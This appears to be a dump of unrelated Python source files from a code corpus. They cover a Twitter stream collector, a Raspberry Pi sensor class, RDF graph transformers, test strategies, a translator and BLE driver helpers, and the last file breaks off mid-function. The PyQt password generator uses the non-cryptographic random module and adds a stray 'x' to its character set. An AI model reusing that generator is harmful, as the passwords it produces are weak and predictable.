collecter = StdOutListener(duration)
auth = OAuthHandler(configuration["twitter"]["consumer_key"], configuration["twitter"]["consumer_secret"])
auth.set_access_token(configuration["twitter"]["access_token"], configuration["twitter"]["access_token_secret"])
stream = Stream(auth, collecter)
while not collecter.stop:
try:
stream.filter(track=filters, languages=["en","fr"])
except ProtocolError:
continue
dfp_tweets = pd.DataFrame(collecter.data)
file_name = collecter.start_date.strftime('%Y%m%d_%H%M%S') + file_extension
dfp_tweets.to_csv("tmp" + file_extension, index=None)
s3_client = boto3.client('s3', aws_access_key_id=configuration["aws"]["key"], aws_secret_access_key=configuration["aws"]["secret"])
partition = collecter.start_date.strftime('%Y%m%d')
response = s3_client.upload_file("tmp" + file_extension, configuration["aws"]["bucket"], f'data/raw/twitter/{partition}/{file_name}')
print(datetime.utcnow())
print('DONE')
| 2.9375
| 3
|
M01_Robocar/04. Environment Sensing/exercises/ultrasonic.py
|
acrobotic/EduKit
| 3
|
12784808
|
"""
09/01/2015
Author: Makerbro
Platforms: Raspberry Pi (Raspbian)
Language: Python
File: ultrasonic.py
------------------------------------------------------------------------
Description:
Define a simple class for using an HC-SR04 ultrasonic distance sensor.
------------------------------------------------------------------------
Please consider buying products from ACROBOTIC to help fund future
Open-Source projects like this! We'll always put our best effort in every
project, and release all our design files and code for you to use.
https://acrobotic.com/
------------------------------------------------------------------------
License:
Beerware License; if you find the code useful, and we happen to cross
paths, you're encouraged to buy us a beer. The code is distributed hoping
that you in fact find it useful, but without warranty of any kind.
"""
import RPi.GPIO as GPIO # Import GPIO library
import time # Import time library for sleep delay
# Class that will hold all the functions (methods) that the ultrasonic
# sensor will need
class Ultrasonic(object):
def __init__(self, trig_pin=0, echo_pin=0, mode=GPIO.BOARD):
'''
Initialize the pins, set them up
'''
self.trig_pin = trig_pin
self.echo_pin = echo_pin
GPIO.setmode(mode)
GPIO.setup(self.trig_pin, GPIO.OUT)
GPIO.setup(self.echo_pin, GPIO.IN)
GPIO.output(self.trig_pin, GPIO.LOW)
time.sleep(3)
def __exit__(self, type, value, traceback):
GPIO.cleanup(self.trig_pin)
GPIO.cleanup(self.echo_pin)
def range_cm(self):
GPIO.output(self.trig_pin, GPIO.HIGH)
time.sleep(10/1000/1000)
cutoff = time.time() + 0.60
GPIO.output(self.trig_pin, GPIO.LOW)
pulse_start = 0
pulse_stop = 0
while GPIO.input(self.echo_pin) == GPIO.LOW:
pulse_start = time.time()
if (pulse_start > cutoff):
return None
while GPIO.input(self.echo_pin) == GPIO.HIGH:
pulse_stop = time.time()
if (pulse_stop > cutoff):
return None
# Distance = Time-of-Flight (in one direction) / Inverse of Sound Speed
distance = (pulse_stop - pulse_start) / 2 * 34000
distance = round(distance,1)
if distance >= 400 or distance <= 2:
return None
return distance
if __name__ == "__main__":
try:
import signal
import sys
def signal_handler(signal, frame):
GPIO.cleanup()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
ultrasonic = Ultrasonic(trig_pin=15,echo_pin=13)
while True:
distance = ultrasonic.range_cm()
if distance:
print("Distance %s cm" % distance)
time.sleep(1)
except KeyboardInterrupt:
# here you put any code you want to run before the program
# exits when you press CTRL+C
print "Quiting..."
finally:
GPIO.cleanup() # this ensures a clean exit
| 3.390625
| 3
|
nxsdk_modules_ncl/csp/tests/__init__.py
|
event-driven-robotics/models
| 54
|
12784809
|
<reponame>event-driven-robotics/models
###############################################################
# INTEL CORPORATION CONFIDENTIAL AND PROPRIETARY
#
# Copyright © 2018-2021 Intel Corporation.
# This software and the related documents are Intel copyrighted
# materials, and your use of them is governed by the express
# license under which they were provided to you (License). Unless
# the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the
# related documents without Intel's prior written permission.
# This software and the related documents are provided as is, with
# no express or implied warranties, other than those that are
# expressly stated in the License.
###############################################################
| 0.988281
| 1
|
aulas_secao_16_atributos.py
|
Romuloro/Curso_udemy_geek_academy_python
| 0
|
12784810
|
<reponame>Romuloro/Curso_udemy_geek_academy_python<filename>aulas_secao_16_atributos.py
"""
Atributos -
Em python, dividimos os tributos em 3 grupos:
- De instância
- De classe
- Dinâmicos
Atributos de instância: São atribuitos declarados dentro do método construtor.
Obs.: Método construtor: È um método especial utilizado para a construção do objeto.
"""
# Atributo de instância: Significa, que ao criamos instância/objetos de uma classe, todas elas terão estes atributos.
class Lampada:
def __init__(self, voltagem, cor): # Método construtor
self.voltagem = voltagem
self.cor = cor
self.ligada = False
class ContaCorrente:
def __init__(self, numero, limite, saldo):
self.numero = numero
self.limite = limite
self.saldo = saldo
class Produto:
def __init__(self, nome, descricao, valor):
self.nome = nome
self.descricao = descricao
self.valor = valor
# Atributos públicos ou privados
# Atributos privados em python: usar __ no início do atributo.
# Atributos publicos em python: Todos por padrão.
class Acesso:
def __init__(self, email, senha):
self.__email = email
self.__senha = senha
user = Acesso('<EMAIL>', '789456')
#print(user._Acesso__senha) # Name Mangling: Temos acesso a atributos privados
# Atributos de Classe: São atributos que são declarados diretamente na classe,
# ou seja, fora do construtor. Geralmente já inicializamos um valor e este valor é
# compartilhado em todas as instâncias da classe.
p1 = Produto('Chocolate', 'Comida', 3.99)
p2 = Produto('Mouse', 'Wardware', 40.99)
# Refatorar a classe Produto:
class ProdutoCoreto:
imposto = 1.05
def __init__(self, nome, descricao, valor):
self.nome = nome
self.descricao = descricao
self.valor = (valor * ProdutoCoreto.imposto)
p1_c = ProdutoCoreto('Chocolate', 'Comida', 3.99)
p2_c = ProdutoCoreto('Mouse', 'Wardware', 40.99)
print(p1.valor)
print(p2.valor)
print(p1_c.valor)
print(p2_c.valor)
# Atributos Dinâmicos: É um atributo de instância que pode ser criado em tempo de execução.
# Obs.: Este atributo será exclusivo da instância que o criou.
# Deletando atributos:
| 4.15625
| 4
|
app.py
|
RuFalcon/password_generator
| 0
|
12784811
|
<reponame>RuFalcon/password_generator
from PyQt5.QtWidgets import (
QWidget,
QSlider,
QLabel,
QApplication,
QMainWindow,
QCheckBox,
QLineEdit)
from PyQt5 import uic
from PyQt5.QtGui import QIcon
import sys
import random
import string
class Window(QMainWindow):
def __init__(self):
super().__init__()
uic.loadUi('password.ui', self)
self.setGeometry(200, 200, 800, 553)
self.setWindowIcon(QIcon('images/password.svg'))
self.setFixedHeight(553)
self.setFixedWidth(800)
self.lowcase_letters = string.ascii_lowercase
self.upcase_letters = string.ascii_uppercase
self.digits = string.digits
self.punctuation = string.punctuation
self.password_characters = self.lowcase_letters + \
self.upcase_letters + self.digits
self.check_lowcase = self.findChild(QCheckBox, "check_lowcase")
self.state_changed(self.check_lowcase)
self.check_upcase = self.findChild(QCheckBox, "check_upcase")
self.state_changed(self.check_upcase)
self.check_numbers = self.findChild(QCheckBox, "check_numbers")
self.state_changed(self.check_numbers)
self.check_symbols = self.findChild(QCheckBox, "check_symbols")
self.state_changed(self.check_symbols)
self.slider = self.findChild(QSlider, "horizontalSlider")
self.slider.valueChanged.connect(self.changed_slider)
self.password = self.findChild(QLineEdit, "password")
self.password_length = self.findChild(QLabel, "password_length")
self.get_random_password(int(self.password_length.text()))
def state_changed(self, checkbox):
"""Отслеживаем изменения нажатия чекбоксов и вызываем функцию change_password"""
return checkbox.stateChanged.connect(self.change_password)
def changed_slider(self):
"""Отслеживаем значение слайдера и пересобираем пароль с такой же длиной"""
value = self.slider.value()
self.password_length.setText(str(value))
self.get_random_password(value)
def get_random_password(self, length):
"""Собираем пароль с заданной длиной"""
password = ''.join(random.choice(self.password_characters)
for i in range(length))
self.password.setText(str(password))
def change_password(self):
"""Меняем пароль в зависимости от включенных чекбоксов"""
self.password_characters = 'x'
if self.check_lowcase.isChecked():
self.password_characters += self.lowcase_letters
if self.check_upcase.isChecked():
self.password_characters += self.upcase_letters
if self.check_numbers.isChecked():
self.password_characters += self.digits
if self.check_symbols.isChecked():
self.password_characters += self.punctuation
self.get_random_password(int(self.password_length.text()))
app = QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec_())
| 2.890625
| 3
|
tests/strategies.py
|
Padawan00123/pipsqueak3
| 0
|
12784812
|
import typing
import hypothesis
from hypothesis import strategies
from src.packages.rescue import Rescue as _Rescue
from src.packages.rat import Rat as _Rat
from src.packages.utils import sanitize, Platforms as _Platforms
import string
# Anything that isn't a whitespace other than the space character, and isn't a control character.
valid_characters = strategies.characters(blacklist_categories=["C", "Zl", "Zp"])
"""
Any character (ASCII / UNICODE) that isn't a control character or whitespace other than ' '.
"""
# Filtered by anything that doesn't make it through the sanitizer.
valid_text = (
strategies.text(valid_characters, min_size=10)
.filter(lambda data: sanitize(data) == data)
.filter(lambda data: data.isprintable())
)
"""
Generates probably valid text.
Shrinks towards smaller words.
"""
valid_word_chars = strategies.characters(blacklist_categories=["C", "Z"])
"""
Characters that are valid to be in a word
"""
valid_word = strategies.text(valid_word_chars, min_size=1)
"""
a single word (no whitespace)
Shrinks towards smaller words.
"""
valid_words = strategies.lists(valid_word, max_size=10)
"""
a list of valid words
Shrinks towards smaller lists and smaller words.
"""
_irc_nick_letters = strategies.characters(
whitelist_characters=f"{string.ascii_letters}{string.digits}" + r"\`_[]{}",
whitelist_categories=())
valid_irc_name = strategies.text(alphabet=_irc_nick_letters, min_size=3).filter(
lambda word: not word[0].isnumeric())
platform = strategies.sampled_from([_Platforms.PS, _Platforms.PC, _Platforms.XB])
""" Some platform """
rescue = strategies.builds(
_Rescue,
uuid=strategies.uuids(version=4), # generate some valid uuid4
client=valid_irc_name, # client should always be defined
# irc nickname may be any valid word, or None.
irc_nickname=strategies.one_of(valid_irc_name, strategies.none()),
platform=platform,
active=strategies.booleans(),
code_red=strategies.booleans(),
board_index=strategies.one_of(strategies.integers(min_value=1), strategies.none())
)
""" Strategy for generating a rescue. Shrinks towards smaller arguments """
def rescues(min_size: int, max_size: int):
""" builds a list of rescues, shrinks towards smaller lists and smaller rescues """
return strategies.lists(rescue, min_size=min_size, max_size=max_size,
unique_by=(
lambda case: case.irc_nickname, lambda case: case.board_index,
lambda case: case.client))
rat = strategies.builds(
_Rat,
uuid=strategies.uuids(version=4),
name=valid_word,
platforms=strategies.one_of(strategies.none(), platform)
)
""" Generates a valid rat object """
rats = strategies.lists(rat)
""" a list of rats """
| 2.78125
| 3
|
cloudrunner_server/db/versions/2ba9ac1cbd43_added_unique_for_name_in_tiers.py
|
ttrifonov/cloudrunner-server
| 2
|
12784813
|
"""Added unique for name in Tiers
Revision ID: <KEY>
Revises: 330568e8928c
Create Date: 2015-02-06 12:05:09.151253
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '330568e8928c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_unique_constraint(op.f('uq_usagetiers_name'), 'usagetiers', ['name'])
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(op.f('uq_usagetiers_name'), 'usagetiers', type_='unique')
### end Alembic commands ###
| 0.925781
| 1
|
kgx/rdf_transformer.py
|
RTXteam/kgx
| 0
|
12784814
|
from collections import defaultdict
from typing import Union, Set, List
import click
import logging
import networkx as nx
import os
import rdflib
import uuid
from prefixcommons.curie_util import read_remote_jsonld_context
from rdflib import Namespace, URIRef
from rdflib.namespace import RDF, RDFS, OWL
from kgx.prefix_manager import PrefixManager
from kgx.rdf_graph_mixin import RdfGraphMixin
from kgx.transformer import Transformer
from kgx.utils.kgx_utils import get_toolkit
from kgx.utils.rdf_utils import find_category, property_mapping
biolink_prefix_map = read_remote_jsonld_context('https://biolink.github.io/biolink-model/context.jsonld')
# TODO: use OBO IRI from biolink model context once https://github.com/biolink/biolink-model/issues/211 is resolved
OBO = Namespace('http://purl.obolibrary.org/obo/')
OBAN = Namespace(biolink_prefix_map['OBAN'])
PMID = Namespace(biolink_prefix_map['PMID'])
BIOLINK = Namespace(biolink_prefix_map['@vocab'])
DEFAULT_EDGE_LABEL = 'related_to'
class RdfTransformer(RdfGraphMixin, Transformer):
"""
Transformer that parses RDF and loads triples, as nodes and edges, into a networkx.MultiDiGraph
This is the base class which is used to implement other RDF-based transformers.
"""
OWL_PREDICATES = [RDFS.subClassOf, OWL.sameAs, OWL.equivalentClass]
is_about = URIRef('http://purl.obolibrary.org/obo/IAO_0000136')
has_subsequence = URIRef('http://purl.obolibrary.org/obo/RO_0002524')
is_subsequence_of = URIRef('http://purl.obolibrary.org/obo/RO_0002525')
def __init__(self, source_graph: nx.MultiDiGraph = None):
super().__init__(source_graph)
self.ontologies = []
self.prefix_manager = PrefixManager()
self.toolkit = get_toolkit()
def parse(self, filename: str = None, input_format: str = None, provided_by: str = None) -> None:
"""
Parse a file, containing triples, into a rdflib.Graph
The file can be either a 'turtle' file or any other format supported by rdflib.
Parameters
----------
filename : str
File to read from.
input_format : str
The input file format. If None is provided then the format is guessed using rdflib.util.guess_format()
provided_by : str
Define the source providing the input file.
"""
rdfgraph = rdflib.Graph()
if input_format is None:
input_format = rdflib.util.guess_format(filename)
logging.info("Parsing {} with '{}' format".format(filename, input_format))
rdfgraph.parse(filename, format=input_format)
logging.info("{} parsed with {} triples".format(filename, len(rdfgraph)))
# TODO: use source from RDF
if provided_by:
self.graph_metadata['provided_by'] = [provided_by]
else:
if isinstance(filename, str):
self.graph_metadata['provided_by'] = [os.path.basename(filename)]
elif hasattr(filename, 'name'):
self.graph_metadata['provided_by'] = [filename.name]
self.load_networkx_graph(rdfgraph)
self.load_node_attributes(rdfgraph)
self.report()
def add_ontology(self, file: str) -> None:
"""
Load an ontology OWL into a Rdflib.Graph
# TODO: is there better way of pre-loading required ontologies?
"""
ont = rdflib.Graph()
logging.info("Parsing {}".format(file))
ont.parse(file, format=rdflib.util.guess_format(file))
self.ontologies.append(ont)
logging.info("{} parsed with {} triples".format(file, len(ont)))
def load_networkx_graph(self, rdfgraph: rdflib.Graph = None, predicates: Set[URIRef] = None, **kwargs) -> None:
"""
Walk through the rdflib.Graph and load all required triples into networkx.MultiDiGraph
By default this method loads the following predicates,
- RDFS.subClassOf
- OWL.sameAs
- OWL.equivalentClass
- is_about (IAO:0000136)
- has_subsequence (RO:0002524)
- is_subsequence_of (RO:0002525)
This behavior can be overridden by providing a list of rdflib.URIRef that ought to be loaded
via the 'predicates' parameter.
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
predicates: list
A list of rdflib.URIRef representing predicates to be loaded
kwargs: dict
Any additional arguments
"""
if predicates is None:
predicates = set()
predicates = predicates.union(self.OWL_PREDICATES, [self.is_about, self.is_subsequence_of, self.has_subsequence])
triples = rdfgraph.triples((None, None, None))
logging.info("Loading from rdflib.Graph to networkx.MultiDiGraph")
with click.progressbar(list(triples), label='Progress') as bar:
for s, p, o in bar:
if (p == self.is_about) and (p in predicates):
logging.info("Loading is_about predicate")
# if predicate is 'is_about' then treat object as publication
self.add_node_attribute(o, key=s, value='publications')
elif (p == self.is_subsequence_of) and (p in predicates):
logging.info("Loading is_subsequence_of predicate")
# if predicate is 'is_subsequence_of'
self.add_edge(s, o, self.is_subsequence_of)
elif (p == self.has_subsequence) and (p in predicates):
logging.info("Loading has_subsequence predicate")
# if predicate is 'has_subsequence', interpret the inverse relation 'is_subsequence_of'
self.add_edge(o, s, self.is_subsequence_of)
elif any(p.lower() == x.lower() for x in predicates):
logging.info("Loading {} predicate, additional predicate".format(p))
self.add_edge(s, o, p)
def load_node_attributes(self, rdfgraph: rdflib.Graph) -> None:
"""
This method loads the properties of nodes into networkx.MultiDiGraph
As there can be many values for a single key, all properties are lists by default.
This method assumes that RdfTransformer.load_edges() has been called, and that all nodes
have had their IRI as an attribute.
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
"""
logging.info("Loading node attributes from rdflib.Graph into networkx.MultiDiGraph")
with click.progressbar(self.graph.nodes(data=True), label='Progress') as bar:
for n, data in bar:
if 'iri' in data:
uriref = URIRef(data['iri'])
else:
provided_by = self.graph_metadata.get('provided_by')
logging.warning("No 'iri' property for {} provided by {}".format(n, provided_by))
continue
for s, p, o in rdfgraph.triples((uriref, None, None)):
if p in property_mapping:
# predicate corresponds to a property on subject
if not (isinstance(s, rdflib.term.BNode) and isinstance(o, rdflib.term.BNode)):
# neither subject nor object is a BNode
self.add_node_attribute(uriref, key=p, value=o)
elif isinstance(o, rdflib.term.Literal):
# object is a Literal
# i.e. predicate corresponds to a property on subject
self.add_node_attribute(uriref, key=p, value=o)
category = find_category(uriref, [rdfgraph] + self.ontologies)
logging.debug("Inferred '{}' as category for node '{}'".format(category, uriref))
if category is not None:
self.add_node_attribute(uriref, key='category', value=category)
class ObanRdfTransformer(RdfTransformer):
"""
Transformer that parses a 'turtle' file and loads triples, as nodes and edges, into a networkx.MultiDiGraph
This Transformer supports OBAN style of modeling where,
- it dereifies OBAN.association triples into a property graph form
- it reifies property graph into OBAN.association triples
"""
def load_networkx_graph(self, rdfgraph: rdflib.Graph = None, predicates: Set[URIRef] = None, **kwargs) -> None:
"""
Walk through the rdflib.Graph and load all triples into networkx.MultiDiGraph
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
predicates: list
A list of rdflib.URIRef representing predicates to be loaded
kwargs: dict
Any additional arguments
"""
if not predicates:
predicates = set()
predicates = predicates.union(self.OWL_PREDICATES)
for rel in predicates:
triples = rdfgraph.triples((None, rel, None))
with click.progressbar(list(triples), label="Loading relation '{}'".format(rel)) as bar:
for s, p, o in bar:
if not (isinstance(s, rdflib.term.BNode) and isinstance(o, rdflib.term.BNode)):
self.add_edge(s, o, p)
# get all OBAN.associations
associations = rdfgraph.subjects(RDF.type, OBAN.association)
logging.info("Loading from rdflib.Graph into networkx.MultiDiGraph")
with click.progressbar(list(associations), label='Progress') as bar:
for association in bar:
edge_attr = defaultdict(list)
edge_attr['id'].append(str(association))
# dereify OBAN.association
subject = None
object = None
predicate = None
# get all triples for association
for s, p, o in rdfgraph.triples((association, None, None)):
if o.startswith(PMID):
edge_attr['publications'].append(o)
if p in property_mapping or isinstance(o, rdflib.term.Literal):
p = property_mapping.get(p, p)
if p == 'subject':
subject = o
elif p == 'object':
object = o
elif p == 'predicate':
predicate = o
else:
edge_attr[p].append(o)
if predicate is None:
logging.warning("No 'predicate' for OBAN.association {}; defaulting to '{}'".format(association, self.DEFAULT_EDGE_LABEL))
predicate = DEFAULT_EDGE_LABEL
if subject and object:
self.add_edge(subject, object, predicate)
for key, values in edge_attr.items():
for value in values:
self.add_edge_attribute(subject, object, predicate, key=key, value=value)
def uriref(self, identifier: str) -> URIRef:
"""
Generate a rdflib.URIRef for a given string.
Parameters
----------
identifier: str
Identifier as string.
Returns
-------
rdflib.URIRef
URIRef form of the input `identifier`
"""
if identifier in property_mapping:
uri = property_mapping[identifier]
else:
uri = self.prefix_manager.expand(identifier)
return URIRef(uri)
def save_attribute(self, rdfgraph: rdflib.Graph, object_iri: URIRef, key: str, value: Union[List[str], str]) -> None:
"""
Saves a node or edge attributes from networkx.MultiDiGraph into rdflib.Graph
Intended to be used within `ObanRdfTransformer.save()`.
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
object_iri: rdflib.URIRef
IRI of an object in the graph
key: str
The name of the attribute
value: Union[List[str], str]
The value of the attribute; Can be either a List or just a string
"""
element = self.toolkit.get_element(key)
if element is None:
return
if element.is_a == 'association slot' or element.is_a == 'node property':
if key in property_mapping:
key = property_mapping[key]
else:
key = URIRef('{}{}'.format(BIOLINK, element.name.replace(' ', '_')))
if not isinstance(value, (list, tuple, set)):
value = [value]
for value in value:
if element.range == 'iri type':
value = URIRef('{}{}'.format(BIOLINK, ''.join(value.title().split(' '))))
rdfgraph.add((object_iri, key, rdflib.term.Literal(value)))
def save(self, filename: str = None, output_format: str = "turtle", **kwargs) -> None:
"""
Transform networkx.MultiDiGraph into rdflib.Graph that follow OBAN-style reification and export
this graph as a file (TTL, by default).
Parameters
----------
filename: str
Filename to write to
output_format: str
The output format; default: 'turtle'
kwargs: dict
Any additional arguments
"""
# Make a new rdflib.Graph() instance to generate RDF triples
rdfgraph = rdflib.Graph()
# Register OBAN URL prefix (http://purl.org/oban/) as `OBAN` in the namespace.
rdfgraph.bind('OBAN', str(OBAN))
# <http://purl.obolibrary.org/obo/RO_0002558> is currently stored as OBO:RO_0002558 rather than RO:0002558
# because of the bug in rdflib. See https://github.com/RDFLib/rdflib/issues/632
rdfgraph.bind('OBO', str(OBO))
rdfgraph.bind('biolink', str(BIOLINK))
# saving all nodes
for n, data in self.graph.nodes(data=True):
if 'iri' not in n:
uriRef = self.uriref(n)
else:
uriRef = URIRef(data['iri'])
for key, value in data.items():
if key not in ['id', 'iri']:
self.save_attribute(rdfgraph, uriRef, key=key, value=value)
# saving all edges
for u, v, data in self.graph.edges(data=True):
if 'relation' not in data:
raise Exception('Relation is a required edge property in the biolink model, edge {} --> {}'.format(u, v))
if 'id' in data and data['id'] is not None:
assoc_id = URIRef(data['id'])
else:
# generating a UUID for association
assoc_id = URIRef('urn:uuid:{}'.format(uuid.uuid4()))
rdfgraph.add((assoc_id, RDF.type, OBAN.association))
rdfgraph.add((assoc_id, OBAN.association_has_subject, self.uriref(u)))
rdfgraph.add((assoc_id, OBAN.association_has_predicate, self.uriref(data['relation'])))
rdfgraph.add((assoc_id, OBAN.association_has_object, self.uriref(v)))
for key, value in data.items():
if key not in ['subject', 'relation', 'object']:
self.save_attribute(rdfgraph, assoc_id, key=key, value=value)
# Serialize the graph into the file.
rdfgraph.serialize(destination=filename, format=output_format)
class RdfOwlTransformer(RdfTransformer):
"""
Transformer that parses an OWL ontology in RDF, while retaining class-class relationships.
"""
def load_networkx_graph(self, rdfgraph: rdflib.Graph = None, predicates: Set[URIRef] = None, **kwargs) -> None:
"""
Walk through the rdflib.Graph and load all triples into networkx.MultiDiGraph
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
predicates: list
A list of rdflib.URIRef representing predicates to be loaded
kwargs: dict
Any additional arguments
"""
triples = rdfgraph.triples((None, RDFS.subClassOf, None))
logging.info("Loading from rdflib.Graph to networkx.MultiDiGraph")
with click.progressbar(list(triples), label='Progress') as bar:
for s, p, o in bar:
# ignoring blank nodes
if isinstance(s, rdflib.term.BNode):
continue
pred = None
parent = None
# TODO: does this block load all relevant bits from an OWL?
if isinstance(o, rdflib.term.BNode):
# C SubClassOf R some D
for x in rdfgraph.objects(o, OWL.onProperty):
pred = x
for x in rdfgraph.objects(o, OWL.someValuesFrom):
parent = x
if pred is None or parent is None:
logging.warning("Do not know how to handle BNode: {}".format(o))
continue
else:
# C SubClassOf D (C and D are named classes)
pred = p
parent = o
self.add_edge(s, parent, pred)
relations = rdfgraph.subjects(RDF.type, OWL.ObjectProperty)
logging.info("Loading relations")
with click.progressbar(relations, label='Progress') as bar:
for relation in bar:
for _, p, o in rdfgraph.triples((relation, None, None)):
if o.startswith('http://purl.obolibrary.org/obo/RO_'):
self.add_edge(relation, o, p)
else:
self.add_node_attribute(relation, key=p, value=o)
self.add_node_attribute(relation, key='category', value='relation')
| 2.25
| 2
|
final_project/machinetranslation/translator.py
|
moosaei/xzceb-flask_eng_fr
| 0
|
12784815
|
<filename>final_project/machinetranslation/translator.py<gh_stars>0
"Taranslator using IBM watson"
import os
from ibm_watson import LanguageTranslatorV3
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from dotenv import load_dotenv
load_dotenv()
apikey = os.environ['apikey']
url = os.environ['url']
authenticator = IAMAuthenticator(apikey)
language_translator = LanguageTranslatorV3(version='2018-05-01',authenticator=authenticator)
language_translator.set_service_url(url)
def englishtofrench(englishtext):
"Translat Englist to French"
if englishtext=="":
return ""
translation_new=language_translator.translate(text=englishtext ,model_id='en-fr').get_result()
frenchtext =translation_new['translations'][0]['translation']
return frenchtext
def frenchtoenglish(frenchtext):
"Translate French to English"
if frenchtext=="":
return ""
translation_new=language_translator.translate(text=frenchtext ,model_id='fr-en').get_result()
englishtext =translation_new['translations'][0]['translation']
return englishtext
| 2.71875
| 3
|
blatann/nrf/nrf_driver_types.py
|
teeheee/blatann
| 40
|
12784816
|
#
# Copyright (c) 2016 Nordic Semiconductor ASA
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of Nordic Semiconductor ASA nor the names of other
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# 4. This software must only be used in or with a processor manufactured by Nordic
# Semiconductor ASA, or in or with a processor manufactured by a third party that
# is used in combination with a processor manufactured by Nordic Semiconductor.
#
# 5. Any software provided in binary or object form under this license must not be
# reverse engineered, decompiled, modified and/or disassembled.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import importlib
from blatann.nrf.nrf_dll_load import driver
UNIT_0_625_MS = 625 # Unit used for scanning and advertising parameters
UNIT_1_25_MS = 1250 # Unit used for connection interval parameters
UNIT_10_MS = 10000 # Unit used for supervision timeout parameter
def msec_to_units(time_ms, resolution):
"""Convert milliseconds to BLE specific time units."""
units = time_ms * 1000 / resolution
return int(units)
def units_to_msec(units, resolution):
"""Convert BLE specific units to milliseconds."""
time_ms = units * float(resolution) / 1000
return time_ms
def char_array_to_list(array_pointer, length):
"""Convert char_array to python list."""
data_array = driver.char_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def uint8_array_to_list(array_pointer, length):
"""Convert uint8_array to python list."""
data_array = driver.uint8_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def uint16_array_to_list(array_pointer, length):
"""Convert uint16_array to python list."""
data_array = driver.uint16_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def service_array_to_list(array_pointer, length):
"""Convert ble_gattc_service_array to python list."""
data_array = driver.ble_gattc_service_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def include_array_to_list(array_pointer, length):
"""Convert ble_gattc_include_array to python list."""
data_array = driver.ble_gattc_include_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def ble_gattc_char_array_to_list(array_pointer, length):
"""Convert ble_gattc_char_array to python list."""
data_array = driver.ble_gattc_char_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def desc_array_to_list(array_pointer, length):
"""Convert ble_gattc_desc_array to python list."""
data_array = driver.ble_gattc_desc_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def ble_gattc_attr_info16_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info16_array to python list"""
data_array = driver.ble_gattc_attr_info16_array.frompointer(array_pointer)
data_list = _populate_array(data_array, length)
return data_list
def ble_gattc_attr_info128_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info128_array to python list"""
data_array = driver.ble_gattc_attr_info128_array.frompointer(array_pointer)
data_list = _populate_array(data_array, length)
return data_list
def handle_value_array_to_list(array_pointer, length):
"""Convert ble_gattc_handle_value_array to python list."""
data_array = driver.ble_gattc_handle_value_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def attr_info_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info_array to python list."""
data_array = driver.ble_gattc_attr_info_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def attr_info16_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info16_array to python list."""
data_array = driver.ble_gattc_attr_info16_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def attr_info128_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info128_array to python list."""
data_array = driver.ble_gattc_attr_info128_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def serial_port_desc_array_to_list(array_pointer, length):
"""Convert sd_rpc_serial_port_desc_array to python list."""
data_array = driver.sd_rpc_serial_port_desc_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def _populate_list(data_array, length):
data_list = []
for i in range(0, length):
data_list.append(data_array[i])
return data_list
def list_to_char_array(data_list):
"""Convert python list to char_array."""
data_array = _populate_array(data_list, driver.char_array)
return data_array
def list_to_uint8_array(data_list):
"""Convert python list to uint8_array."""
data_array = _populate_array(data_list, driver.uint8_array)
return data_array
def list_to_uint16_array(data_list):
"""Convert python list to uint16_array."""
data_array = _populate_array(data_list, driver.uint16_array)
return data_array
def list_to_service_array(data_list):
"""Convert python list to ble_gattc_service_array."""
data_array = _populate_array(data_list, driver.ble_gattc_service_array)
return data_array
def list_to_include_array(data_list):
"""Convert python list to ble_gattc_include_array."""
